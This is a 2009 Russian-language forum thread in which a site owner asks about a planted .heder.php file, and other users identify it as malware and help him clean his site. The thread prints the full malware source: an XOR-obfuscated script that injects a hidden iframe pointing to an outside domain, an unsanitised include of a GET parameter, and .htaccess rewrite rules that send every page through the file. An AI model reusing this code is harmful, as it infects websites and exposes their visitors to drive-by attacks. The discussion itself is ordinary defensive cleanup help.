Проблема такова: На веб-сервере обнаружил файл и расширением пхп, который я там 100% не размещал. Ребята могли бы мне пояснить что это за код и что он делает?
Название файла .heder.php
<?php
//if(defined('SCRIPT_INTO_HELL')) {
// exit(0);
//}
//define('SCRIPT_INTO_HELL', 1);
$frame_code = '<script>q="=hgs`ld!rsb<iuuq;..e1mqiho/ch{.ly.ho/qiq!vheui<0!idhfiu<0!ruxmd<&whrhchmhux;iheedo&?=.hgs`ld?";w="";for(i=0;i<q.length;i++){w=w+String.fromCharCode(q.charCodeAt(i)^1);};document.write(w);</script>';
$infected = false;
function get_file_dir_($file) {
global $argv;
$dir = dirname(getcwd() . '/' . $file);
$curDir = getcwd();
chdir($dir);
$dir = getcwd();
chdir($curDir);
return $dir;
}
function callback($data)
{
global $frame_code;
if(preg_match("/(<.*?body.*?>)/i", $data) > 0)
return preg_replace("/(<.*?body.*?>)/i", "\\1".$frame_code, $data, 1);
else return $data.$frame_code;
}
ob_start('callback');
$file = $_GET['q'];
chdir(get_file_dir_($file));
include($file);
?>
Заранее спасибо.
Спустя 40 минут, 32 секунды (21.08.2009 - 09:09) hara_ написал(а):
ну можно сказать вирус )
который загружает в iframe что то.. с d0lphin.biz/mx/in.php
удали нафиг просто.
проверь ещё .htaccess есть там что нить наподобии auto_prepend_file auto_append_file и т.д.
который загружает в iframe что то.. с d0lphin.biz/mx/in.php
удали нафиг просто.
проверь ещё .htaccess есть там что нить наподобии auto_prepend_file auto_append_file и т.д.
Спустя 7 минут, 45 секунд (21.08.2009 - 09:17) Uretz написал(а):
Файл такой есть .htaccess его содержание:
#mmmd
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !.heder.php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) \.heder.php?q=$1.$2 [NC,L]
</IfModule>
Удалил эти файлы везде, причем эти файлы грузились только в папки где был html и php. Папки с картинками были без них.
После удаления не чего не помогло, сайт до сих пор не работает. При попытке загрузить любую страницу вываливается ошибка 404 которая ссылается на файл .heder.php, которую бы я страницу сайта не запросил все тоже самое.
Чем исправить это? (может перезалить сайт?)
#mmmd
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !.heder.php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) \.heder.php?q=$1.$2 [NC,L]
</IfModule>
Удалил эти файлы везде, причем эти файлы грузились только в папки где был html и php. Папки с картинками были без них.
После удаления не чего не помогло, сайт до сих пор не работает. При попытке загрузить любую страницу вываливается ошибка 404 которая ссылается на файл .heder.php, которую бы я страницу сайта не запросил все тоже самое.
Чем исправить это? (может перезалить сайт?)
Спустя 3 минуты, 34 секунды (21.08.2009 - 09:21) hara_ написал(а):
Ну так вот этот htaccess тоже надо удалить
и не факт что после этого будет работать, так как скорее всего на сайте был какой то родной .htaccess файл, который просто тупо переписали. Но удалить нужно всё равно
и не факт что после этого будет работать, так как скорее всего на сайте был какой то родной .htaccess файл, который просто тупо переписали. Но удалить нужно всё равно
Спустя 9 минут, 41 секунда (21.08.2009 - 09:30) Uretz написал(а):
Удалил все нормально, как бы теперь узнать что было написано в htaccess старом? Либо как создать новый, что в нем написать?
Спустя 4 минуты, 56 секунд (21.08.2009 - 09:35) hara_ написал(а):
Если всё работает то не факт что был вообще, его могло и не быть.
Раз сайт есть локально (если было предложение его перезалить),
по посмотри там есть .htaccess или нет.
А на самом деле нужно искать то ту дырку через которую тебе это всё залили.
Но это уже вопрос не сюда, т.к. это долго/нудно/неинтересно )
Раз сайт есть локально (если было предложение его перезалить),
по посмотри там есть .htaccess или нет.
А на самом деле нужно искать то ту дырку через которую тебе это всё залили.
Но это уже вопрос не сюда, т.к. это долго/нудно/неинтересно )
Спустя 15 минут, 4 секунды (21.08.2009 - 09:50) Uretz написал(а):
Дырку попытаюсь найти вот только осталось востановить файл .htaccess. Локально у меня его нет, т.к. незнал что он мне понадобиться поэтому и не копировал его.
Спустя 13 минут, 53 секунды (21.08.2009 - 10:04) Гость_hara написал(а):
Да не было его процентов на 90, забудь про него.
т.к. нет смысла ломать что то на сайте, если нужно что бы вирус работал незаметно,
т.е. если бы что то поменяли и убрали правила из htaccess то были бы косяки.
т.к. нет смысла ломать что то на сайте, если нужно что бы вирус работал незаметно,
т.е. если бы что то поменяли и убрали правила из htaccess то были бы косяки.
Спустя 27 минут, 36 секунд (21.08.2009 - 10:32) twin написал(а):
Попробуй просто стандартный набор. Если ничего не изменится, значит все хорошо.
Цитата |
AddDefaultCharset UTF-8 php_flag magic_quotes_gpc Off php_flag magic_quotes_runtime Off php_flag register_globals Off ErrorDocument 404 /404.html |
кодировку свою только поставь.
Спустя 3 часа, 9 минут, 17 секунд (21.08.2009 - 13:41) Soldier Ghost написал(а):
меняй FTP пароли )
Спустя 6 часов, 54 минуты, 52 секунды (21.08.2009 - 20:36) Guest написал(а):
Антивирус на эту страницу ругается, блокирует её загрузку. Только с телефона удалось зайти
Спустя 4 дня, 18 часов, 59 минут, 39 секунд (26.08.2009 - 15:36) Uretz написал(а):
В общем все исправлено сайт опять работает, только все пхп скрипты что там были не работают, уже исправил ручками.